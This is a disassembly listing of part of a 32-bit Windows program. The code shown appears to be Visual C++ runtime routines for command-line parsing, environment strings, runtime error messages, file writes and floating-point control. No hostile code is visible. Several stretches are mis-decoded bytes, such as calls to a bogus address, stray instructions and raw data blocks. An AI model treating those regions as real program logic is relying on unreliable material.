; ---------------------------------------------------------------------------
loc_41777E: ; CODE XREF: sub_4176AC+CD�j
cmp byte ptr [eax], 0
jz loc_41784F
test edi, edi
jz short loc_417793
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_417793: ; CODE XREF: sub_4176AC+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_417798: ; CODE XREF: sub_4176AC+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_4177A1: ; CODE XREF: sub_4176AC+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_4177AA
inc eax
inc ebx
jmp short loc_4177A1
; ---------------------------------------------------------------------------
loc_4177AA: ; CODE XREF: sub_4176AC+F8�j
cmp byte ptr [eax], 22h
jnz short loc_4177DB
test bl, 1
jnz short loc_4177D9
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_4177C8
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_4177C8
mov eax, edx
jmp short loc_4177CB
; ---------------------------------------------------------------------------
loc_4177C8: ; CODE XREF: sub_4176AC+10D�j
; sub_4176AC+116�j
mov [ebp+arg_0], edi
loc_4177CB: ; CODE XREF: sub_4176AC+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_4177D9: ; CODE XREF: sub_4176AC+106�j
shr ebx, 1
loc_4177DB: ; CODE XREF: sub_4176AC+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_4177F0
inc ebx
loc_4177E3: ; CODE XREF: sub_4176AC+142�j
test esi, esi
jz short loc_4177EB
mov byte ptr [esi], 5Ch
inc esi
loc_4177EB: ; CODE XREF: sub_4176AC+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_4177E3
loc_4177F0: ; CODE XREF: sub_4176AC+134�j
mov dl, [eax]
test dl, dl
jz short loc_417840
cmp [ebp+arg_10], 0
jnz short loc_417806
cmp dl, 20h
jz short loc_417840
cmp dl, 9
jz short loc_417840
loc_417806: ; CODE XREF: sub_4176AC+14E�j
cmp [ebp+arg_0], 0
jz short loc_41783A
test esi, esi
jz short loc_417829
movzx ebx, dl
test ds:byte_460D81[ebx], 4
jz short loc_417822
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_417822: ; CODE XREF: sub_4176AC+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_417838
; ---------------------------------------------------------------------------
loc_417829: ; CODE XREF: sub_4176AC+162�j
movzx edx, dl
test ds:byte_460D81[edx], 4
jz short loc_417838
inc eax
inc dword ptr [ecx]
loc_417838: ; CODE XREF: sub_4176AC+17B�j
; sub_4176AC+187�j
inc dword ptr [ecx]
loc_41783A: ; CODE XREF: sub_4176AC+15E�j
inc eax
jmp loc_417798
; ---------------------------------------------------------------------------
loc_417840: ; CODE XREF: sub_4176AC+148�j
; sub_4176AC+153�j ...
test esi, esi
jz short loc_417848
and byte ptr [esi], 0
inc esi
loc_417848: ; CODE XREF: sub_4176AC+196�j
inc dword ptr [ecx]
jmp loc_417766
; ---------------------------------------------------------------------------
loc_41784F: ; CODE XREF: sub_4176AC+BD�j
; sub_4176AC+D5�j
test edi, edi
jz short loc_417856
and dword ptr [edi], 0
loc_417856: ; CODE XREF: sub_4176AC+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_4176AC endp
; ---------------------------------------------------------------------------
push ecx
push ecx
mov eax, ds:dword_45F9FC
push ebx
push ebp
mov ebp, ds:dword_41C03C
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4178AE
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41788F
mov ds:dword_45F9FC, 1
jmp short loc_4178B7
; ---------------------------------------------------------------------------
loc_41788F: ; CODE XREF: seg000:00417881�j
call ds:dword_41C040 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_417989
mov ds:dword_45F9FC, 2
jmp loc_41793D
; ---------------------------------------------------------------------------
loc_4178AE: ; CODE XREF: seg000:00417879�j
cmp eax, 1
jnz loc_417938
loc_4178B7: ; CODE XREF: seg000:0041788D�j
cmp esi, ebx
jnz short loc_4178C7
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_417989
loc_4178C7: ; CODE XREF: seg000:004178B9�j
cmp [esi], bx
mov eax, esi
jz short loc_4178DC
loc_4178CE: ; CODE XREF: seg000:004178D3�j
; seg000:004178DA�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_4178CE
inc eax
inc eax
cmp [eax], bx
jnz short loc_4178CE
loc_4178DC: ; CODE XREF: seg000:004178CC�j
sub eax, esi
mov edi, ds:dword_41C11C
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+34h], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41792D
push ebp
call sub_410C0F
cmp eax, ebx
pop ecx
mov [esp+10h], eax
jz short loc_41792D
push ebx
push ebx
push ebp
push eax
push dword ptr [esp+24h]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_417929
push dword ptr [esp+10h]
call sub_410C83
pop ecx
mov [esp+10h], ebx
loc_417929: ; CODE XREF: seg000:00417919�j
mov ebx, [esp+10h]
loc_41792D: ; CODE XREF: seg000:004178F9�j
; seg000:00417908�j
push esi
call ds:dword_41C044 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41798B
; ---------------------------------------------------------------------------
loc_417938: ; CODE XREF: seg000:004178B1�j
cmp eax, 2
jnz short loc_417989
loc_41793D: ; CODE XREF: seg000:004178A9�j
cmp edi, ebx
jnz short loc_41794D
call ds:dword_41C040 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_417989
loc_41794D: ; CODE XREF: seg000:0041793F�j
cmp [edi], bl
mov eax, edi
jz short loc_41795D
loc_417953: ; CODE XREF: seg000:00417956�j
; seg000:0041795B�j
inc eax
cmp [eax], bl
jnz short loc_417953
inc eax
cmp [eax], bl
jnz short loc_417953
loc_41795D: ; CODE XREF: seg000:00417951�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_410C0F
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_417973
xor esi, esi
jmp short loc_41797E
; ---------------------------------------------------------------------------
loc_417973: ; CODE XREF: seg000:0041796D�j
push ebp
push edi
push esi
call sub_4105F0
add esp, 0Ch
loc_41797E: ; CODE XREF: seg000:00417971�j
push edi
call near ptr 3D0000h
mov ebx, 2EBC68Bh
loc_417989: ; CODE XREF: seg000:00417899�j
; seg000:004178C1�j ...
xor eax, eax
loc_41798B: ; CODE XREF: seg000:00417936�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_417992: ; CODE XREF: seg000:00412A57�p
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_410C0F
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4179B2
push 1Bh
call sub_412ADE
pop ecx
loc_4179B2: ; CODE XREF: seg000:004179A8�j
mov ds:dword_460B60, esi
mov ds:dword_460C60, 20h
lea eax, [esi+100h]
loc_4179C8: ; CODE XREF: seg000:004179E4�j
cmp esi, eax
jnb short loc_4179E6
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_460B60
add esi, 8
add eax, 100h
jmp short loc_4179C8
; ---------------------------------------------------------------------------
loc_4179E6: ; CODE XREF: seg000:004179CA�j
lea eax, [esp+10h]
push eax
call near ptr 0BE0004h
mov eax, ds:247C8366h
inc edx
add [edi], cl
test al, ch
; ---------------------------------------------------------------------------
dw 0
dd 24448B00h, 0FC08544h, 0B984h, 8D308B00h, 0B80468h, 3B000008h
dd 2E1C8DF0h, 0F08B027Ch, 0C603539h, 527D0046h, 460B64BFh
dd 1006800h, 0DCE80000h, 85FFFF91h, 387459C0h, 0C600583h
dd 89200046h, 888D07h, 3B000001h, 801873C1h, 83000460h
dd 40C6FF08h, 0F8B0A05h, 8108C083h, 100C1h, 83E4EB00h
dd 353904C7h, 460C60h, 6EBBB7Ch, 0C60358Bh, 0FF330046h
dd 467EF685h, 0F883038Bh, 8A3674FFh, 0C1F6004Dh, 0F62E7401h
dd 0B7508C1h, 856AE850h, 8553FFFBh, 8B1E74C0h, 0C1CF8BC7h
dd 0E18305F8h, 85048B1Fh, 460B60h, 8BC8048Dh, 8A08890Bh
dd 4888004Dh, 83454704h, 0FE3B04C3h, 0DB33BA7Ch, 460B60A1h
dd 0D83C8300h, 0D8348DFFh, 0DB854D75h, 810446C6h, 0F66A0575h
dd 8B0AEB58h, 0D8F748C3h, 0C083C01Bh, 15E850F5h, 61007E85h
dd 0FF83F88Bh, 571774FFh, 808507E8h, 0C0853800h, 0FF250C74h
dd 89000000h, 2F8833Eh, 4E800675h, 0FEB4004h, 7503F883h
dd 44E800Ah, 8004EB08h, 4380044Eh, 7C03FB83h, 6035FF9Bh
dd 0E800460Ch, 8284D0h, 5D5E5F07h, 44C4835Bh, 0CCCCCCC3h
dd 30324356h, 30304358h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B48 proc near ; DATA XREF: seg000:004129F2�o
; sub_4150ED+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_417BE8
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_417B7B: ; CODE XREF: sub_417B48+90�j
cmp esi, 0FFFFFFFFh
jz short loc_417BE1
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_417BCF
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_417BCF
js short loc_417BDA
mov edi, [ebx+8]
push ebx
call sub_4111B0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4111F2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_411286
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_417BCF: ; CODE XREF: sub_417B48+40�j
; sub_417B48+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_417B7B
; ---------------------------------------------------------------------------
loc_417BDA: ; CODE XREF: sub_417B48+54�j
mov eax, 0
jmp short loc_417BFD
; ---------------------------------------------------------------------------
loc_417BE1: ; CODE XREF: sub_417B48+36�j
mov eax, 1
jmp short loc_417BFD
; ---------------------------------------------------------------------------
loc_417BE8: ; CODE XREF: sub_417B48+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4111F2
add esp, 8
pop ebp
mov eax, 1
loc_417BFD: ; CODE XREF: sub_417B48+97�j
; sub_417B48+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_417B48 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4111F2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_417C20 proc near ; CODE XREF: sub_412ADE+9�p
; sub_412B03+9�p
mov eax, ds:dword_45F898
cmp eax, 1
jz short loc_417C37
test eax, eax
jnz short locret_417C58
cmp ds:dword_42E184, 1
jnz short locret_417C58
loc_417C37: ; CODE XREF: sub_417C20+8�j
push 0FCh
call near ptr sub_417C59
mov eax, ds:dword_45FA00
pop ecx
test eax, eax
jz short loc_417C4D
call eax
loc_417C4D: ; CODE XREF: sub_417C20+29�j
push 0FFh
call near ptr sub_417C59
pop ecx
locret_417C58: ; CODE XREF: sub_417C20+C�j
; sub_417C20+15�j
retn
sub_417C20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C59 proc far ; CODE XREF: sub_412ADE+12�p
; sub_412B03+12�p ...
var_72EC8A40 = byte ptr -72EC8A40h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_FFFFFFFC = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_FFFFFFFC]
xor ecx, ecx
mov eax, offset dword_42E7F8
loc_417C6C: ; CODE XREF: sub_417C59+20�j
cmp edx, [eax]
jz short loc_417C7B
add eax, 8
inc ecx
cmp eax, offset dword_42E888
jl short loc_417C6C
loc_417C7B: ; CODE XREF: sub_417C59+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, ds:dword_42E7F8[esi]
jnz loc_417DA9
mov eax, ds:dword_45F898
cmp eax, 1
jz loc_417D83
test eax, eax
jnz short loc_417CAC
cmp ds:dword_42E184, 1
jz loc_417D83
loc_417CAC: ; CODE XREF: sub_417C59+44�j
cmp edx, 0FCh
jz loc_417DA9
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call near ptr 3D0000h
or [ebp+var_72EC8A40], al
test [esi+edi*8-1], ebx
jmp fword ptr [eax+44h]
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 41h, 0, 50h
; ---------------------------------------------------------------------------
call sub_411B70
pop ecx
pop ecx
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_410B60
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_417D26
lea eax, [ebp+var_1A4]
push eax
call sub_410B60
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_411D00
add esp, 10h
loc_417D26: ; CODE XREF: sub_417C59+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_411B70
lea eax, [ebp+var_A0]
push edi
push eax
call sub_411B80
lea eax, [ebp+var_A0]
push offset asc_41CB20 ; "\n\n"
push eax
call sub_411B80
push ds:dword_42E7FC[esi]
lea eax, [ebp+var_A0]
push eax
call sub_411B80
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_4195E1
add esp, 2Ch
pop edi
jmp short loc_417DA9
; ---------------------------------------------------------------------------
loc_417D83: ; CODE XREF: sub_417C59+3C�j
; sub_417C59+4D�j
lea eax, [ebp+arg_FFFFFFFC]
lea esi, dword_42E7FC[esi]
push 0
push eax
push dword ptr [esi]
call sub_410B60
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call near ptr 3D0000h
push ecx
push eax
call near ptr 3D0000h
outsd
loc_417DA9: ; CODE XREF: sub_417C59+2E�j
; sub_417C59+59�j ...
pop esi
leave
retn
sub_417C59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417DAC proc near ; CODE XREF: sub_412B27+95�p
; sub_412B27+E8�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, ds:dword_460C60
push esi
push edi
jnb loc_417F40
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:460B60h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_417F40
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_417DFD
loc_417DF6: ; CODE XREF: sub_417DAC+177�j
xor eax, eax
jmp loc_417F54
; ---------------------------------------------------------------------------
loc_417DFD: ; CODE XREF: sub_417DAC+48�j
test al, 20h
jz short loc_417E0D
push 2
push edi
push ecx
call sub_4169A2
add esp, 0Ch
loc_417E0D: ; CODE XREF: sub_417DAC+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_417EDC
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_417F14
loc_417E2D: ; CODE XREF: sub_417DAC+F5�j
lea eax, [ebp+var_414]
loc_417E33: ; CODE XREF: sub_417DAC+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_417E67
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_417E52
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_417E52: ; CODE XREF: sub_417DAC+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_417E33
loc_417E67: ; CODE XREF: sub_417DAC+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call near ptr 3D0000h
dec edi
test eax, eax
jz short loc_417ED1
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_417EA3
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_417E2D
loc_417EA3: ; CODE XREF: sub_417DAC+EA�j
; sub_417DAC+12E�j
xor edi, edi
loc_417EA5: ; CODE XREF: sub_417DAC+150�j
; sub_417DAC+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_417F3B
cmp [ebp+arg_0], edi
jz short loc_417F14
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_417F09
mov ds:dword_45F844, 9
mov ds:dword_45F848, eax
jmp loc_417F51
; ---------------------------------------------------------------------------
loc_417ED1: ; CODE XREF: sub_417DAC+E0�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_417EA3
; ---------------------------------------------------------------------------
loc_417EDC: ; CODE XREF: sub_417DAC+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call near ptr 3D0000h
xchg eax, edi
test eax, eax
jz short loc_417EFE
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_417EA5
; ---------------------------------------------------------------------------
loc_417EFE: ; CODE XREF: sub_417DAC+145�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_417EA5
; ---------------------------------------------------------------------------
loc_417F09: ; CODE XREF: sub_417DAC+10F�j
push [ebp+arg_0]
call sub_41724D
pop ecx
jmp short loc_417F51
; ---------------------------------------------------------------------------
loc_417F14: ; CODE XREF: sub_417DAC+7B�j
; sub_417DAC+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_417F29
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_417DF6
loc_417F29: ; CODE XREF: sub_417DAC+16F�j
mov ds:dword_45F844, 1Ch
mov ds:dword_45F848, edi
jmp short loc_417F51
; ---------------------------------------------------------------------------
loc_417F3B: ; CODE XREF: sub_417DAC+FE�j
sub eax, [ebp+var_10]
jmp short loc_417F54
; ---------------------------------------------------------------------------
loc_417F40: ; CODE XREF: sub_417DAC+15�j
; sub_417DAC+37�j
and ds:dword_45F848, 0
mov ds:dword_45F844, 9
loc_417F51: ; CODE XREF: sub_417DAC+120�j
; sub_417DAC+166�j ...
or eax, 0FFFFFFFFh
loc_417F54: ; CODE XREF: sub_417DAC+4C�j
; sub_417DAC+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_417DAC endp
; =============== S U B R O U T I N E =======================================
sub_417F59 proc near ; CODE XREF: sub_412B27+6C�p
; sub_4164EB+32�p ...
arg_0 = dword ptr 4
inc ds:dword_45FA04
push 1000h
call sub_410C0F
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_417F82
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_417F93
; ---------------------------------------------------------------------------
loc_417F82: ; CODE XREF: sub_417F59+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_417F93: ; CODE XREF: sub_417F59+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_417F59 endp
; =============== S U B R O U T I N E =======================================
sub_417F9D proc near ; CODE XREF: sub_412B27+61�p
; sub_4172B4+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_460C60
jb short loc_417FAC
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_417FAC: ; CODE XREF: sub_417F9D+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_460B60[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_417F9D endp
; ---------------------------------------------------------------------------
mov eax, ds:dword_460B40
push esi
push 14h
test eax, eax
pop esi
jnz short loc_417FD7
mov eax, 200h
jmp short loc_417FDD
; ---------------------------------------------------------------------------
loc_417FD7: ; CODE XREF: seg000:00417FCE�j
cmp eax, esi
jge short loc_417FE2
mov eax, esi
loc_417FDD: ; CODE XREF: seg000:00417FD5�j
mov ds:dword_460B40, eax
loc_417FE2: ; CODE XREF: seg000:00417FD9�j
push 4
push eax
call sub_41966A
pop ecx
mov ds:dword_45FB34, eax
test eax, eax
pop ecx
jnz short loc_418016
push 4
push esi
mov ds:dword_460B40, esi
call sub_41966A
pop ecx
mov ds:dword_45FB34, eax
test eax, eax
pop ecx
jnz short loc_418016
push 1Ah
call sub_412ADE
pop ecx
loc_418016: ; CODE XREF: seg000:00417FF3�j
; seg000:0041800C�j
xor ecx, ecx
mov eax, offset dword_42E888
loc_41801D: ; CODE XREF: seg000:00418031�j
mov edx, ds:dword_45FB34
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_42EB08
jl short loc_41801D
xor edx, edx
mov ecx, offset dword_42E898
loc_41803A: ; CODE XREF: seg000:00418064�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, ds:dword_460B60[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_418057
test eax, eax
jnz short loc_41805A
loc_418057: ; CODE XREF: seg000:00418051�j
or dword ptr [ecx], 0FFFFFFFFh
loc_41805A: ; CODE XREF: seg000:00418055�j
add ecx, 20h
inc edx
cmp ecx, offset dword_42E8F8
jl short loc_41803A
pop esi
retn
; ---------------------------------------------------------------------------
call sub_416475
cmp ds:byte_45F884, 0
jz short locret_41807B
jmp loc_4196E7
; ---------------------------------------------------------------------------
locret_41807B: ; CODE XREF: seg000:00418074�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41807C proc near ; CODE XREF: sub_412C3C+2D4�p
; sub_412C3C+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_418088
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418088: ; CODE XREF: sub_41807C+8�j
cmp ds:dword_45F8D0, 0
jnz short loc_4180A3
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_4180D5
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4180A3: ; CODE XREF: sub_41807C+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push ds:dword_42E39C
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push ds:dword_45F8E0
call ds:dword_41C11C ; WideCharToMultiByte
test eax, eax
jz short loc_4180D5
cmp [ebp+arg_0], 0
jz short loc_4180E2
loc_4180D5: ; CODE XREF: sub_41807C+1E�j
; sub_41807C+51�j
mov ds:dword_45F844, 2Ah
or eax, 0FFFFFFFFh
loc_4180E2: ; CODE XREF: sub_41807C+57�j
pop ebp
retn
sub_41807C endp
; ---------------------------------------------------------------------------
loc_4180E4: ; CODE XREF: sub_413446+5E�p
; sub_417022+9A�p
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41CB60
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov eax, ds:dword_45FA08
xor ebx, ebx
cmp eax, ebx
jnz short loc_418153
lea eax, [ebp-1Ch]
push eax
push 1
pop esi
push esi
push offset dword_41C850
push esi
call ds:dword_41C028 ; GetStringTypeW
test eax, eax
jz short loc_418131
mov eax, esi
jmp short loc_41814E
; ---------------------------------------------------------------------------
loc_418131: ; CODE XREF: seg000:0041812B�j
lea eax, [ebp-1Ch]
push eax
push esi
push offset dword_42F3E4
push esi
push ebx
call near ptr 3D0000h
hlt
; ---------------------------------------------------------------------------
test eax, eax
jz loc_418219
push 2
pop eax
loc_41814E: ; CODE XREF: seg000:0041812F�j
mov ds:dword_45FA08, eax
loc_418153: ; CODE XREF: seg000:00418113�j
cmp eax, 2
jnz short near ptr loc_41817B+1
mov eax, [ebp+1Ch]
cmp eax, ebx
jnz short loc_418164
mov eax, ds:dword_45F8D0
loc_418164: ; CODE XREF: seg000:0041815D�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
push eax
call near ptr 3D0000h
mov ecx, 9FE9h
loc_41817B: ; CODE XREF: seg000:00418156�j
add [ebx-7AF0FE08h], al
xchg eax, esp
; ---------------------------------------------------------------------------
dw 0
dd 185D3900h, 0E0A10875h, 890045F8h, 53531845h, 0FF1075FFh
dd 458B0C75h, 1BD8F720h, 8E083C0h, 75FF5040h, 2015FF18h
dd 890041C1h, 0C33BE045h, 5D896374h, 3C8DFCh, 0C083C78Bh
dd 0E8FC2403h, 0FFFF8A18h, 8BE86589h, 0DC7589F4h, 0E8565357h
dd 0FFFF83B8h, 0EB0CC483h, 58016A0Bh, 0E8658BC3h, 0F633DB33h
dd 0FFFC4D83h, 2974F33Bh, 56E075FFh, 0FF1075FFh, 16A0C75h
dd 0FF1875FFh, 41C12015h, 74C33B00h, 1475FF10h, 75FF5650h
dd 2815FF08h, 0EB0041C0h
db 2
; ---------------------------------------------------------------------------
loc_418219: ; CODE XREF: seg000:00418145�j
xor eax, eax
lea esp, [ebp-34h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41822D proc near ; CODE XREF: sub_414606+52�p
xor eax, eax
retn
sub_41822D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418230 proc near ; CODE XREF: sub_418265+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_41827B
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_41830D
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_418230 endp
; =============== S U B R O U T I N E =======================================
sub_418265 proc near ; CODE XREF: sub_4148F2+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_418230
pop ecx
pop ecx
retn
sub_418265 endp
; =============== S U B R O U T I N E =======================================
sub_41827B proc near ; CODE XREF: sub_418230+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_41828C
push 10h
pop eax
loc_41828C: ; CODE XREF: sub_41827B+C�j
test bl, 4
jz short loc_418293
or al, 8
loc_418293: ; CODE XREF: sub_41827B+14�j
test bl, 8
jz short loc_41829A
or al, 4
loc_41829A: ; CODE XREF: sub_41827B+1B�j
test bl, 10h
jz short loc_4182A1
or al, 2
loc_4182A1: ; CODE XREF: sub_41827B+22�j
test bl, 20h
jz short loc_4182A8
or al, 1
loc_4182A8: ; CODE XREF: sub_41827B+29�j
test bl, 2
jz short loc_4182B2
or eax, 80000h
loc_4182B2: ; CODE XREF: sub_41827B+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_4182EA
cmp edx, 400h
jz short loc_4182E7
cmp edx, 800h
jz short loc_4182E3
cmp edx, esi
jnz short loc_4182EA
or eax, edi
jmp short loc_4182EA
; ---------------------------------------------------------------------------
loc_4182E3: ; CODE XREF: sub_41827B+5E�j
or eax, ebp
jmp short loc_4182EA
; ---------------------------------------------------------------------------
